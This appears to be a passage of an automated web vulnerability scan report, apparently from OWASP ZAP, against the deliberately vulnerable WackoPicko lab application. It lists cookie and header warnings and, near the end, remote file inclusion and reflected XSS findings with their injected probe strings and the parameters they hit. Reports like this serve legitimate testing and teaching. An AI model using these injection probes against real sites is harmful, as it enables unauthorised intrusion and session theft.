A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=almbndb9qocrjo1n55i0n69av3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016
Parameter
PHPSESSID=s39d3eb75c2h9njn0he4p18mi2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416
Parameter
PHPSESSID=8mln0d8dmd8heusmaf3i85k6b5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816
Parameter
PHPSESSID=2lfiemor34h4vrnb8g8givi7p3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216
Parameter
PHPSESSID=2l1uhu0mp36civmd4a6g4fh480; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616
Parameter
PHPSESSID=o9814ldp10lnb58c6qguv779e4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016
Parameter
PHPSESSID=ssh9j73p2ld9iv6cc3ue2fcvi1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416
Parameter
PHPSESSID=6igta2os37mua6bb7sb7aed9c0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816
Parameter
PHPSESSID=ro2nqfa7k1rslovsu8gjlgl836; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

High (Warning)Remote File Inclusion

Description

Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.

Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.

An attacker can use RFI for:

* Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.

* Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies).

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=http%3A%2F%2Fwww.google.com%3A80%2Fsearch%3Fq%3DOWASP%2520ZAP
Parameter
page
Attack
<title>OWASP ZAP.php - Google Search</title>

Solution

Phase: Architecture and Design

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.

Phases: Architecture and Design; Operation

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

For PHP, the interpreter offers restrictions such as open basedir or safe mode which can make it more difficult for an attacker to escape out of the application. Also consider Suhosin, a hardened PHP extension, which includes various options that disable some of the more dangerous PHP features.

Phase: Implementation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

For filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Phases: Architecture and Design; Operation

Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.

This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce your attack surface.

Phases: Architecture and Design; Implementation

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.

Reference

http://projects.webappsec.org/Remote-File-Inclusion

http://cwe.mitre.org/data/definitions/98.html

CWE Id

98

WASC Id

5

High (Warning)Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
comment
Attack
</p><script>alert(1);</script><p>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning)Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
User-Agent
Attack
</p><script>alert(1);</script><p>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning)Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
Host
Attack
</p><script>alert(1);</script><p>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning)Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
Parameter
query
Attack
"><script>alert(1);</script>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

